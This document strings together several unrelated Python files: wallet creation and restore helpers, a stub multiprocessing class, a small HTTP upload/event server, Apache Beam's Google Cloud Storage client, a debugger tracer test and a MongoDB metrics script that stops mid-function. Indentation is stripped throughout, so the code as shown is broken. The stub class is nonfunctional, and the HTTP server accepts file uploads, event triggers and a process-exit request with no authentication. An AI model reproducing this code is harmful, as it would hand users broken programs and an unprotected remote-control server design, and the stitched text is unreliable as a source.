storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
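# Hedged usage sketch (path and config are placeholders):
# >>> d = create_new_wallet(path='/tmp/wallet_file', config=config,
# ...                       password='s3cret', seed_type='electrum')
# >>> d['seed']     # write this down; see d['msg']
# >>> d['wallet']   # a ready, synchronized Standard_Wallet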
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
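# Hedged sketch of the accepted `text` forms (all values are placeholders):
# >>> restore_wallet_from_text('xpub6CUGRU...', path=p, config=config)       # master public key
# >>> restore_wallet_from_text('KxFC1jmwwC...', path=p, config=config)       # private key list
# >>> restore_wallet_from_text('wild father tree ...', path=p, config=config)  # seed phrase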
|
multiprocess_module.py | import tensor
import NN as nn
import multiprocessing
class Process:
def __init__(self, process_num):
self.process_num = process_num
def run(self, iters):
for _ in range(self.process_num - 1):
# spawn a worker process; it must be started explicitly
multiprocessing.Process(target=self._run, args=(iters,)).start()
self._run(iters)
def _run(self, iters):
returnValue = 0
for item in iters:
for value in item:
returnValue = value
return returnValue |
http_server.py | __author__ = "mashed-potatoes"
from os import curdir, mkdir, _exit
from os.path import join, isdir
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from pymitter import EventEmitter
from modules.config import HOME_PATH
class StoreHandler(BaseHTTPRequestHandler):
route = "/upload"
emitter = None
debug = False
def accepted(self) -> None:
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"Accepted")
def not_found(self) -> None:
self.send_response(404)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"Error 404. Not Found.")
self.wfile.close()
def log_message(self, format, *args) -> None:
if self.debug:
return super().log_message(format, *args)
def do_GET(self) -> None:
url = urlparse(self.path)
if url.path == "/emit" and self.emitter:
qs = parse_qs(url.query)
self.accepted()
def payload():
self.emitter.emit(
qs["event"][0], qs["args"][0] if "args" in qs else None
)
Thread(target=payload).start()
elif url.path == "/exit":
_exit(0xEE)
else:
self.not_found()
def do_POST(self) -> None:
url = urlparse(self.path)
if url.path == self.route:
length = self.headers["Content-Length"]
data = self.rfile.read(int(length))
fn = parse_qs(url.query)["filename"][0]
name = join(
HOME_PATH, "".join([x if x.isalnum() or x == "." else "_" for x in fn])
)
with open(name, "wb") as fh:
fh.write(data)
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
self.wfile.write(b"OK")
else:
self.not_found()
class NetIO:
server = HTTPServer
emitter = None
handler = StoreHandler
def __init__(self, port: int):
self.server = HTTPServer(("", port), self.handler)
if not isdir(HOME_PATH):
mkdir(HOME_PATH)
def set_emitter(self, emitter: EventEmitter) -> None:
self.handler.emitter = emitter
def start(self) -> None:
self.server.serve_forever()
|
gcsio.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
# pytype: skip-file
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
_LOGGER = logging.getLogger(__name__)
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and its usage after apitools moves to using an
# API-specific batch endpoint, or after the Beam gcsio module starts using a
# GCS client library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
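# Illustrative examples of the parse above (bucket/object names are made up):
#   parse_gcs_path('gs://my-bucket/path/to/obj')            -> ('my-bucket', 'path/to/obj')
#   parse_gcs_path('gs://my-bucket/', object_optional=True) -> ('my-bucket', '')
#   parse_gcs_path('gs://my-bucket/')                        raises ValueError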
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __init__(self, storage_client=None):
if storage_client is None:
storage_client = storage.StorageV1(
credentials=auth.get_service_credentials(),
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(self.client, filename,
buffer_size=read_buffer_size)
return io.BufferedReader(DownloaderStream(downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(UploaderStream(uploader, mode=mode),
buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
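  # Usage sketch (assumes application default credentials are available in the
  # environment; the bucket and object names below are illustrative):
  #   gcs = GcsIO()
  #   with gcs.open('gs://my-bucket/data.bin', 'w') as f:
  #     f.write(b'payload')
  #   with gcs.open('gs://my-bucket/data.bin') as f:
  #     payload = f.read()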
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError: on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
while not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
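    # Keep re-issuing batched Rewrite calls: each pass batches only the pairs
    # that have neither completed nor failed, carrying forward the rewriteToken
    # from the previous response so multi-chunk rewrites resume where they
    # left off.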
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
    Returns: last updated time of the GCS object in seconds.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
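    # The arithmetic below converts `updated` (treated as a UTC wall-clock
    # datetime) to Unix epoch seconds: mktime() interprets the struct_time in
    # local time, so time.timezone is subtracted to compensate, and the
    # sub-second component is added back separately.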
return (time.mktime(datetime.timetuple()) - time.timezone
+ datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
_LOGGER.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
_LOGGER.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
_LOGGER.info("Finished listing %s files in %s seconds.",
counter, time.time() - start_time)
return file_sizes
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
_LOGGER.error('HTTP error while requesting file %s: %s', self._path,
http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream, auto_transfer=False, chunksize=self._buffer_size,
num_retries=20)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
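    # The Downloader interface uses a half-open [start, end) range, while
    # apitools' GetRange takes an inclusive end offset, hence `end - 1` below.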
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
_LOGGER.error('Error in _start_upload while inserting file %s: %s',
self._path, traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
|
_debugger_case_check_tracer.py | import threading, atexit, sys
from collections import namedtuple
import os.path
if sys.version_info[0] >= 3:
from _thread import start_new_thread
else:
from thread import start_new_thread
FrameInfo = namedtuple('FrameInfo', 'filename, name, f_trace')
def _atexit():
sys.stderr.flush()
sys.stdout.flush()
# Flush the output streams at process exit so the final TEST SUCEEDED msg is not lost.
atexit.register(_atexit)
def _iter_frame_info(frame):
while frame is not None:
yield FrameInfo(
os.path.basename(frame.f_code.co_filename),
frame.f_code.co_name,
frame.f_trace.__name__ if frame.f_trace is not None else "None"
)
frame = frame.f_back
def check_frame_info(expected):
found = list(_iter_frame_info(sys._getframe().f_back))
def fail():
raise AssertionError('Expected:\n%s\n\nFound:\n%s\n' % (
'\n'.join(str(x) for x in expected),
'\n'.join(str(x) for x in found)))
for found_info, expected_info in zip(found, expected):
if found_info.filename != expected_info.filename or found_info.name != expected_info.name:
fail()
for f_trace in expected_info.f_trace.split('|'):
if f_trace == found_info.f_trace:
break
else:
fail()
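# Note: an expected f_trace entry may list alternatives separated by '|'
# (e.g. 'trace_dispatch|None'); the for/else in check_frame_info fails the
# assertion only when none of the alternatives matches the found tracer name.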
def thread_func():
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='_bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='_bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='__bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='__bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None'),
])
th = threading.Thread(target=thread_func)
th.setDaemon(True)
th.start()
event = threading.Event()
def thread_func2():
try:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func2', f_trace='trace_exception'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='trace_unhandled_exceptions')
])
finally:
event.set()
start_new_thread(thread_func2, ())
event.wait()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight
# chance that we didn't get the notification because the thread could've
# stopped executing, so sleep a bit so that the test does not become flaky.
import time
time.sleep(.3)
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='_pydev_execfile.py', name='execfile', f_trace='None'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None'),
])
print('TEST SUCEEDED')
|
bkg_metrics_job_script.py | import time
import multiprocessing as mp
import pymongo
from datetime import datetime, timedelta
from pymongo import MongoClient
import logging
import sys
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
MONGO_DB_URL = 'mongodb://localhost:27017/'
DATABASE_NAME = 'hpc_monitoring'
EPOCH_BEGIN_DATETIME = datetime.fromtimestamp(0)
# get unix milliseconds from python datetime
def unix_time_millis(dt):
return int(float(dt.strftime("%s.%f")) * 1000)
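# Illustrative behaviour (assuming a platform whose strftime supports the
# glibc "%s" extension; it is not portable, e.g. unavailable on Windows, and
# it interprets the datetime in local time):
#   unix_time_millis(datetime.fromtimestamp(1.5)) -> 1500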
# 1. For each metric collection, calculate and insert minutely, hourly and daily averages
def processCollection(name, structure):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
mainCollection = db[name]
minutelyCollection = db[name + '.minutely']
hourlyCollection = db[name + '.hourly']
dailyCollection = db[name + '.daily']
            # Make sure these indexes exist for faster querying
minutelyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
minutelyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
hourlyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
hourlyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
dailyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
dailyCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
mainCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
''' Check if data exists already'''
minutelyLastTimestamp = 0
hourlyLastTimestamp = 0
dailyLastTimestamp = 0
            '''Variables that control whether to process only minutely or hourly records in the current loop'''
processMinutely = False
processHourly = False
            # The daily and hourly averages should be calculated only at the beginning of the
            # next day or the beginning of the next hour, so define variables which store the
            # dayValue and hourValue of the last minuteTimestamp
minutelyLastTimestampDayValue = 0
minutelyLastTimestampHourValue = 0
for doc in minutelyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
minutelyLastTimestamp = doc['Timestamp']
dateTemp = datetime.fromtimestamp(minutelyLastTimestamp / 1000.0)
minutelyLastTimestampDayValue = datetime(dateTemp.year, dateTemp.month, dateTemp.day)
minutelyLastTimestampHourValue = datetime(dateTemp.year, dateTemp.month, dateTemp.day,
dateTemp.hour)
for doc in hourlyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
hourlyLastTimestamp = doc['Timestamp']
for doc in dailyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
dailyLastTimestamp = doc['Timestamp']
minutelySum = {}
minutelyCount = {}
hourlySum = {}
hourlyCount = {}
dailySum = {}
dailyCount = {}
currentMinute = 0 # 0 means start of new minute
currentHour = 0 # 0 means start of new hour
currentDay = 0 # 0 means start of new day
# filter query
filter = {}
            if minutelyLastTimestamp != 0 and hourlyLastTimestamp != 0 and dailyLastTimestamp != 0:
currentDateTimeTemp = datetime.now()
todayDate = datetime(currentDateTimeTemp.year, currentDateTimeTemp.month, currentDateTimeTemp.day)
if todayDate == minutelyLastTimestampDayValue or todayDate == (
minutelyLastTimestampDayValue + timedelta(days=1)):
if minutelyLastTimestampDayValue > datetime.fromtimestamp(
dailyLastTimestamp / 1000.0):
filter = {"Timestamp": {'$gte': dailyLastTimestamp}}
elif minutelyLastTimestampHourValue > datetime.fromtimestamp(
hourlyLastTimestamp / 1000.0):
filter = {"Timestamp": {'$gte': hourlyLastTimestamp}}
processHourly = True
else:
filter = {"Timestamp": {'$gte': minutelyLastTimestamp}}
processMinutely = True
else:
filter = {"Timestamp": {'$gte': dailyLastTimestamp}}
